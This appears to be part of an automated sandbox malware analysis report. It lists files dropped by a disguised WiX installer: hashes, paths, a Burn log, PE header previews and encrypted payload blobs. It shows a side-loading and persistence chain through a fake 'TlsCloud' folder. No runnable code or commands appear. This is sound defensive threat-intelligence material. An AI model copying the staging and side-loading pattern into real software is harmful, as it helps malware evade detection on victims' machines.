                                                          Category:dropped
                                                          Size (bytes):5537870
                                                          Entropy (8bit):7.692585092067747
                                                          Encrypted:false
                                                          SSDEEP:98304:8HevOfbm1blCTylnpvLG66RbQ/j70Z79EeBavpi7A6JBYA4cfunYkKpRO/:Ee6qrnhG6N/j7WTYQs6JBTpf/fg
                                                          MD5:A25B65F9A2EF04E4E8C65F3253CC42C2
                                                          SHA1:A014CD2B5672DC7909BB5D915D19D44D7C64D133
                                                          SHA-256:AEBEEBD2C501B876F7B557B888F612C8AF638B114ADF654CAAE2F4B1290B83D1
                                                          SHA-512:DAEC2C17375342A308B9E6707370D6A5881E61C91DCC661FD6A125517BC8E0A6E5C7222AF1AAEC4106C7AECE46F0E32CB268CF6C2809045D36F3F0D9FD05B8FD
                                                          Malicious:false
                                                          Preview:..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..*{..{+...:..f...D..._'..E...X'..J..f...w+..L...X'..J...[{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..b...B...Q...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..h..._...X...H...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..b5..y^..B...X....5..w=..F...Y...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..K...L..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{

                                                          C:\Users\user\AppData\Local\Temp\Coastguardsman_20241007011406.log

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):987
                                                          Entropy (8bit):5.417951670591397
                                                          Encrypted:false
                                                          SSDEEP:24:rbAIeLLzz6IYoTcP2wY2cP2MncP2UfsNFcP2GJIcP2AL:nxY+VlsRChbh/vL
                                                          MD5:A4252F083F8806E5AF461C02CDCF76FB
                                                          SHA1:F410AB5B8E63C14E9704AFDACA3D5DAAFD4A4B57
                                                          SHA-256:76C3A4A45495C44A037751BDD5760E74E3AF4598A9D4EF1941A54F3AEED9EB11
                                                          SHA-512:BD9483F2E138DF7B3EC32FD4AABF979BF57DC3074EC0ACF05B55E16DEF0169B4DC599C03BE8C15F8C00DD6A010CBFD24F08CCE163C1D84262792DB594CE816BD
                                                          Malicious:false
                                                          Preview:[1BF0:1BEC][2024-10-07T01:14:06]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe..[1BF0:1BEC][2024-10-07T01:14:06]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\KClGcCpDAP.exe -burn.filehandle.attached=524 -burn.filehandle.self=544'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\KClGcCpDAP.exe'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Coastguardsman_20241007011406.log'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleName' to value 'Coastguardsman'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleManufacturer' to value 'Friarbird'..

                                                          C:\Users\user\AppData\Local\Temp\bewwwy

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2440704
                                                          Entropy (8bit):6.770175571116754
                                                          Encrypted:false
                                                          SSDEEP:49152:8IWkFYuXpRMXFltR9cFWkYQ47ZcDacMG+S/Y7Szu6ID4ANA9mzlazGesK/WdpfBW:/+rtnj6IBNA0ZazGmyc
                                                          MD5:B671C30F27A58DA64F62E00F4A8F7858
                                                          SHA1:6912A5B517132037D2CA9C8D6840993952624CDA
                                                          SHA-256:B349504434ED7B3E4E051F08A93E1383444FB1CE94895F5172B7F1760C712805
                                                          SHA-512:6F52AEC623161C2C1E4276019C666C9485FFD0F78627E619EDDC5B02B6FA4B6B5972D07047854E61E959C40331934ADD09458E59C697732DD3A800EFADBFE538
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....sN..................".."%..`..W..........@............................. ,.....\.&...`... ...............................................+.......+.8.....$..b............+.............................@{$.(.....................+..............................text.....".......".................`..`.data...p.....".......".............@....rdata.. .....#.......#.............@..@.pdata...b....$..d...f$.............@..@.xdata.. M....%..N....$.............@..@.bss....._...P%..........................idata........+.......%.............@....CRT....0.....+.......%.............@....tls..........+.......%.............@....rsrc...8.....+...... %.............@..@.reloc........+......"%.............@..Bgfcdpo... ....,......&%.............@...................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\f99c993e

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5537870
                                                          Entropy (8bit):7.692585388546547
                                                          Encrypted:false
                                                          SSDEEP:98304:LHevOfbm1blCTylnpvLG66RbQ/j70Z79EeBavpi7A6JBYA4cfunYkKpRO/:re6qrnhG6N/j7WTYQs6JBTpf/fg
                                                          MD5:EBD3DF5FD956E7F15C2AA15A94DF12E7
                                                          SHA1:9058C43027EBD0F571009DDE377D93B05042F5DC
                                                          SHA-256:9CE3596EB51E5974FCD2C8BE193B055A55A2D7A402CAD07465D0470C1E7472C5
                                                          SHA-512:3EBE66D716B6B6BAB9FBB0CE611CAF83A932DD73A43CCDF15DDDF6B0417405D72AC3D9CDB484DC9A4172F03F226E8C285C753CF032ACA21E95AFC06A7E05C013
                                                          Malicious:false
                                                          Preview:..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..*{..{+...:..f...D..._'..E...X'..J..f...w+..L...X'..J...[{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..b...B...Q...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..h..._...X...H...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..b5..y^..B...X....5..w=..F...Y...+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..K...L..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{..+{

                                                          C:\Users\user\AppData\Local\Temp\jamulieilmfjkk

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2440704
                                                          Entropy (8bit):6.770175571116754
                                                          Encrypted:false
                                                          SSDEEP:49152:8IWkFYuXpRMXFltR9cFWkYQ47ZcDacMG+S/Y7Szu6ID4ANA9mzlazGesK/WdpfBW:/+rtnj6IBNA0ZazGmyc
                                                          MD5:B671C30F27A58DA64F62E00F4A8F7858
                                                          SHA1:6912A5B517132037D2CA9C8D6840993952624CDA
                                                          SHA-256:B349504434ED7B3E4E051F08A93E1383444FB1CE94895F5172B7F1760C712805
                                                          SHA-512:6F52AEC623161C2C1E4276019C666C9485FFD0F78627E619EDDC5B02B6FA4B6B5972D07047854E61E959C40331934ADD09458E59C697732DD3A800EFADBFE538
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....sN..................".."%..`..W..........@............................. ,.....\.&...`... ...............................................+.......+.8.....$..b............+.............................@{$.(.....................+..............................text.....".......".................`..`.data...p.....".......".............@....rdata.. .....#.......#.............@..@.pdata...b....$..d...f$.............@..@.xdata.. M....%..N....$.............@..@.bss....._...P%..........................idata........+.......%.............@....CRT....0.....+.......%.............@....tls..........+.......%.............@....rsrc...8.....+...... %.............@..@.reloc........+......"%.............@..Bgfcdpo... ....,......&%.............@...................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2364728
                                                          Entropy (8bit):6.606009669324617
                                                          Encrypted:false
                                                          SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                          MD5:967F4470627F823F4D7981E511C9824F
                                                          SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                          SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                          SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: 46L03o2EOY.exe, Detection: malicious, Browse
                                                          • Filename: 46L03o2EOY.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\xdhqslqcnobw

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 7 04:14:07 2024, mtime=Mon Oct 7 04:14:08 2024, atime=Sun Oct 6 07:05:58 2024, length=3559696, window=hide
                                                          Category:dropped
                                                          Size (bytes):924
                                                          Entropy (8bit):5.04272071613665
                                                          Encrypted:false
                                                          SSDEEP:12:8FyK4EWCaddY//fpuLAV72h6dbxYjAArHRRUJBHEFyBmV:8evvd+3pIY72hCx8AAtRUf3Bm
                                                          MD5:E39B41AE526DB5DE5395D18C3A1EF265
                                                          SHA1:D33530ADEC2E028267D1EF442E3D48736ADD20B4
                                                          SHA-256:D9409DCFCBA4AE308848C5890551C5C7902EEED9054314BC8F3FA0130172E2CE
                                                          SHA-512:32D94E30CB44118C90D0E31BCC4DEB50EA2E8D1879F160B4855ED59B6E17FA473F71E481C176B58A285BE06688F4B5ED021A8513AAE9E24FE01668D02992C13B
                                                          Malicious:false
                                                          Preview:L..................F.... ....*x.w....v..w.....O......Q6.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....\..w.......w.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^GY.)...........................%..A.p.p.D.a.t.a...B.V.1.....GY.)..Roaming.@......CW.^GY.)............................q.R.o.a.m.i.n.g.....l.1.....GY.)..TLSCLO~1..T......GY.)GY.)..........................e.$.T.l.s.C.l.o.u.d._.W.R.v.3._.x.6.4.....b.2..Q6.FY.@ .Virtual.exe.H......GY.)GY.)....1.........................V.i.r.t.u.a.l...e.x.e.......k...............-.......j..............8.....C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe..+.....\.....\.R.o.a.m.i.n.g.\.T.l.s.C.l.o.u.d._.W.R.v.3._.x.6.4.\.V.i.r.t.u.a.l...e.x.e.`.......X.......436432...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxDDU.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):380176
                                                          Entropy (8bit):6.432472275317664
                                                          Encrypted:false
                                                          SSDEEP:6144:TTKw9G2rivrR7YR+euVO05XMog3N0++++I333O333qj333MEq333h3333f92333O:CcN3u++++I333O333qj333MJ333h333r
                                                          MD5:496DF6AD1A158ED5037138E397713EF0
                                                          SHA1:287BD2219C955687BAA399DED57E9AB64334C63C
                                                          SHA-256:07C04290F53AAAAA7DF6B6EA3A53103B6E3EF8FF658D8097617A9C48DFC6E90A
                                                          SHA-512:422DA26A8F50C1F02C1CC7C4BED37CDB33732039BBA82F32C2A14BAA8C6A7BC5544856AB26A2071B5EA8E731A296E2C69071DA2F067312D05763AA3A9928BB3A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: orderconfirmation.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........O.L.!.L.!.L.!.E...F.!.WX..N.!.k.Z.N.!....M.!.#...O.!.L. ...!.#...N.!.#...F.!.#...N.!.WX..T.!.WX..M.!.WX..M.!.RichL.!.................PE..d.....)R.........." .....2...z.......:....................................................@.........................................@Y..D...t@..................|A.......#...........W...............................................P..X............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data........p.......L..............@....pdata..|A.......B...`..............@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxRT.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4242944
                                                          Entropy (8bit):6.558992499072821
                                                          Encrypted:false
                                                          SSDEEP:49152:zTNFpHJVfZqJru0K1kLo7RrObviwkZcrA2P16szn0uyIeOGTrLvQb8Sg7Z:TVfZq+1kLRGIn0uy7wb8
                                                          MD5:24860E7E6DB53271D89CC5A9D7F4C73A
                                                          SHA1:AA1B31CC4B7B451B65F7D60DE02301F89C2247EF
                                                          SHA-256:1F9F015E8363E279491D893782F506617A8D97E8901B71950DD5782FD1C6A21E
                                                          SHA-512:2B16D70C1B9C0A4F38CA7B88A131E69DE2DC880FE0048860A9ED1D80AE2359E0CE0F6FBCE191CFB59FD4D0AE1D7CB8FF9D44844F45BF6206AC1B7EA1A8349F3D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=..\x..\x..\x....\x..$.\x......\x..*.\x..\y..]x.8....\x..*.\x..*..\x..*..\x.....]x..\x..\x.....]x....\x....\x.Rich.\x.........PE..d.....)R.........." .....:#..................................................pA......4A...@..........................................89.3...l.9......`@.......=.p............p@......[#..............................................P#.h............................text...i8#......:#................. ..`.rdata......P#......>#.............@..@.data.........<..^....;.............@....pdata..p.....=......>=.............@..@.rsrc........`@.......?.............@..@.reloc.......p@.......?.............@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe

                                                          Download File
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3559696
                                                          Entropy (8bit):6.200307727314802
                                                          Encrypted:false
                                                          SSDEEP:49152:AQ902GYI12BpN8G/i6Hdw2u68X5RPrftuX9wZcQm2J9FjdH0pdTrRBlkG0BjMEgr:H9DGYIob9wp68pRzVsiHI9atBjMEY
                                                          MD5:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          SHA1:6CB3212EC9BE08CB5A29BF8D37E9CA845EFC18C9
                                                          SHA-256:448402C129A721812FA1C5F279F5CA906B9C8BBCA652A91655D144D20CE5E6B4
                                                          SHA-512:9815EBA1566A8E33734F6A218071EC501DD1F799B1535E25D87C2B416B928AE8D15F8218CF20E685F9907EC39C202CBFC4728FE6AB9D87B3DE345109F626845E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................<...D......#.....'.....!.........D#...8..............,.....C..D.....D%...D"...Rich...........................PE..d.....)R.........."......R ..........|.........@..............................6.....)$7...@.................................................0.,.T....`0......0..`"....6..#... 6..:.... ..............................................p .H............................text....P ......R ................. ..`.rdata..H....p ......V .............@..@.data...h....0-.......-.............@....pdata..`"...0...$....-.............@..@.rsrc........`0.......0.............@..@.reloc...Y... 6..Z....5.............@..B........................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\ehky

                                                          Download File
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4404646
                                                          Entropy (8bit):7.953147866148555
                                                          Encrypted:false
                                                          SSDEEP:98304:Pw2L5u5Ahg6i2pmv4ECQx/gPtB09ES7GME15o:uz6xmv4JMgjBSSN15o
                                                          MD5:EB9428E9ED12824BEB9193BEA1DE018B
                                                          SHA1:804E7CF5B5EC4AE00183F7732DD4C8BEEFEC1E33
                                                          SHA-256:97DD176827F278064CD981567F992CFB7F2BA966377BE03163C9C32C28F4CB9A
                                                          SHA-512:3CC2BB1111C9BD557195DF53F041563A9BF91F03F2E1385CCB25AA5EADB6C1F7CF2D3FFBB090418C340763CD29E129BDB41C86EC2CD7975D7B02EB7CF13DBC96
                                                          Malicious:false
                                                          Preview:T...f..fibV...CHE.Ra....Z.....U.v.....T_.g....B..l.v.o.p.c\l.\s...iU._r....x]..B.F.jr...AV.D.....Yw....POx........LR^G.p_..]..c.LKE....SK..y.L..A_vF....W..Wt.o.\MS...g.rW.T....R^.Vo.n.Hr..C.Qp..UO.iTo.N.ZYuMHo..x..P...[DyEvB...`oC.e]..j....XqH[x.o.u..e\NlV.\...e.R.H..e..J.C..G.....qv..J...`J.w.f...DYs.I..r^r..Ors.m...u\b`.n..s.Vl..DW..P...G..A...g.c..od..yF[a.LK....GN..Kj..qopFp.d.ivNo....B........._I[.a.j..Bd.Uc.K.G......vb.ivLkASy....p.bh..wJ.S.hm...il.o..t.`...D.G..ACOVNKe......i.i._.[.l...LK...`..p\y.._.K.WG.....m...\xiVX.Cy.....p..K.r.F.`.M._P..Mf.KQ._.N..tgp..\aW....^...wIFj.ikO.a.dcHV\Y..UQ.l].I]]....pR.JyijxJu.jb..EY.k.[..NnUux..l.GCQH.f.o].w.P..N......O..O..EhQ....V....s._V..B.ctL..g.._d.o...ArfZ.g.x...r_vdG...GFV^L..h........wlIl.cvJ...[..Tl.Yi...mBSv.].......g.d.rs^.K.MlI..^.UmJUFW..kA..[rL..F[][...fWcj.DrPT.i.JECs.......O..........tSE..v....]hHT..g.DXK^V..[.uH..\.s[..EY_IG........D.f...Z.MD....pXBKM.....qS....]io.k.L..qmp_r.rK.G...._d.c.x`G..Z...Q..LB.L..a`X..]q.....y..K..J

                                                          C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\lni

                                                          Download File
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66844
                                                          Entropy (8bit):4.603621025311295
                                                          Encrypted:false
                                                          SSDEEP:1536:wwBw6vQwfuDIO9zR3hNIyByM1kelM5VZmiXwy6Mno8aCPCzw:L2qQ3I4z/NIQyPelWtwy6Mn1auh
                                                          MD5:48AA3E0E2CB511F84BF02ABFB6BF1824
                                                          SHA1:F9C0E44CBCFACD1662420161D97AF4EAD8193368
                                                          SHA-256:8E837DBC26C3A1DE1252164FEC16FFF6D681F764CCD90ED4E42FE1E7F020808A
                                                          SHA-512:D4DDAB655C732CC3073CBFDB7CB8786B2474049AC52B713FDBA53F4C8A17ACB42D6FBDEBC55E4CD287CD37A7A00F3541578E6062D9832D0FCA48107F84A77E0A
                                                          Malicious:false
                                                          Preview:..stX..NQv[G.sUPhT.k...KA...a_F.O..M..OG^..C..C...sr]vYf......D^...^d.j..Ox...v.h..q.FF..H.S.j...JiBn..Gf.B.fxm..L..x.p.svi.k.G..A.klkgf.c...Np............w.bG`.efs.b.t.H.A..ji.........]SE.t.yb..d....Vo..k.C.Z..B.s.D...lS]..T\..]h.C\.H....r.k..YJHr..N..[YX.J..gv.k.....\.V.aecltkQ^.......b[y.Lgu...Y.da.EE..d...yf.uVwk...QAx.EJ[bxdap.B.A..g...U.QQo.Z.iU.......f......RQ..bHo[^l`..KDc.mO......T.]M.Vl.xj........]Jeli_i..g...hqB..h.....J^b^.]T..._.......UJseZ...j..].U..n.G._..h.J...Ru....iD.]CTx.soJb......r.Xk].N._.G..`n.kFnWd.G...r..T...wRj.DD...seZ.CV....YB..^....B..W.bEo..fY....nH.yTm[.I.D..pFprBb.rq^\..FE..klN.GDAh...Li\...^u_U]JBYr.Io.....Y.........Tw.L.........].ce.JJgA..X..m.CU.Q.Xh.u..DuJ..U\r.k.e...Qq...EOK.qY.r.ZE.i.]..B....ug.s.GtFKA.C.v.W.aR..n...]..t.Wtr..gFmSq..cxV..Q.b.kU.P.AE.s.QYH.d.y..VW...v....FZ..xSx.C.umJUl.....ARXO.I.].BL..o.Sw...f.fE..o.P_.dkT.mJG.uX.....mLw...X...KQP..BEE..c_iR....T...DJ...s.Z.m.bMH.._.i.x...kn.Bbe_.Y...`K.R.rLccqa.s..G.A.......o..Nv........p]].E.v.Q.

                                                          C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcp100.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.297676823354886
                                                          Encrypted:false
                                                          SSDEEP:12288:koBFUsQ1H5FH3YUTd/df0RA7XkNvEKZm+aWodEEiblHN/:dFUsQ1H5FHdGKkNvEKZm+aWodEEcHN/
                                                          MD5:D029339C0F59CF662094EDDF8C42B2B5
                                                          SHA1:A0B6DE44255CE7BFADE9A5B559DD04F2972BFDC8
                                                          SHA-256:934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C
                                                          SHA-512:021D9AF52E68CB7A3B0042D9ED6C9418552EE16DF966F9CCEDD458567C47D70471CB8851A69D3982D64571369664FAEEAE3BE90E2E88A909005B9CDB73679C82
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..-`..~`..~`..~i.4~b..~{.;~c..~`..~...~..?~a..~{.9~a..~{..~P..~{..~Y..~{..~e..~{.<~a..~{.=~a..~{.:~a..~Rich`..~........................PE..d.....M.........." .........f.......q........cy..........................................@.............................................m......<....P...........=...0..P....`.......................................................................................text............................... ..`.rdata..-...........................@..@.data...0L.......8..................@....pdata...=.......>..................@..@.rsrc........P......................@..@.reloc..R....`......................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcr100.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):829264
                                                          Entropy (8bit):6.553848816796836
                                                          Encrypted:false
                                                          SSDEEP:12288:QgzGPEett9Mw9HfBCddjMb2NQVmTW75JfmyyKWeHQGoko+1:HzJetPMw9HfBCrMb2Kc6dmyyKWewGzB1
                                                          MD5:366FD6F3A451351B5DF2D7C4ECF4C73A
                                                          SHA1:50DB750522B9630757F91B53DF377FD4ED4E2D66
                                                          SHA-256:AE3CB6C6AFBA9A4AA5C85F66023C35338CA579B30326DD02918F9D55259503D5
                                                          SHA-512:2DE764772B68A85204B7435C87E9409D753C2196CF5B2F46E7796C99A33943E167F62A92E8753EAA184CD81FB14361E83228EB1B474E0C3349ED387EC93E6130
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pm...>...>...>..>...>...>F..>...>...>...>..>...>..>...>D..>...>...>...>...>...>...>Rich...>........................PE..d......M.........." ..........................sy............................. ......A.....@.........................................pt.......`..(...............pb......P............................................................................................text...F........................... ..`.rdata..............................@..@.data...L}... ...R..................@....pdata..pb.......d...Z..............@..@_CONST..............................@...text.....2... ...4..................@.. data.........`......................@..@.rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):224447
                                                          Entropy (8bit):6.442059221275934
                                                          Encrypted:false
                                                          SSDEEP:6144:IyoStdQp+6F4lElBs1QlBUYroYbCVf1JJKDo7wvFR58AJfdh:IyoStdQUBElBs1Ql2YEs//h
                                                          MD5:D13F84F117685C1B3BD321CA4A8E9F34
                                                          SHA1:137A58F8A95126D8A033CFC84F1020A92F794069
                                                          SHA-256:0A5FCDC9B80E5AB3767E8CB89EC8D7FF166BBBA96D3569557B81427BEAA68508
                                                          SHA-512:5C7346450BE04ADE7E967D4EAAE31208876981E0540925B5A56F961B196701B997653BEC8F0B3CB5ECC886F28273B384D49FD16F6FC6A0E0712A4FE3B2B08973
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#...%.....R............... ....Hk................................2]....@... ......................P.......p..4...........................................................$........................r..H............................text...l...........................`..`.data........ ......................@....rdata......0......................@..@/4.......l.......n..................@..@.bss.........@...........................edata.......P......................@..@.idata..4....p......................@....CRT....,...........................@....tls.................0..............@....rsrc................2..............@....reloc...............:..............@..B........................................................................................................................................................................................

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\BootstrapperApplicationData.xml

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (472), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2366
                                                          Entropy (8bit):3.7598685393990285
                                                          Encrypted:false
                                                          SSDEEP:48:y+03qHhhObBXjvpne1GgZEJ0z0w8g5yc3gkTxR4VvgkWHaisgUGgprRiGGgpr5kl:X0n6LH0w9ycRRovgkTH7rRV7rI
                                                          MD5:F731DB3DEAE9A801F932CFB3671C732F
                                                          SHA1:E4714D83F7203DDCCAD1221BA67A7BC147AAF14F
                                                          SHA-256:79C65F96AD557EC77D3A266F2C455464C102AE4A0FA440F1F302D43B9FAB9696
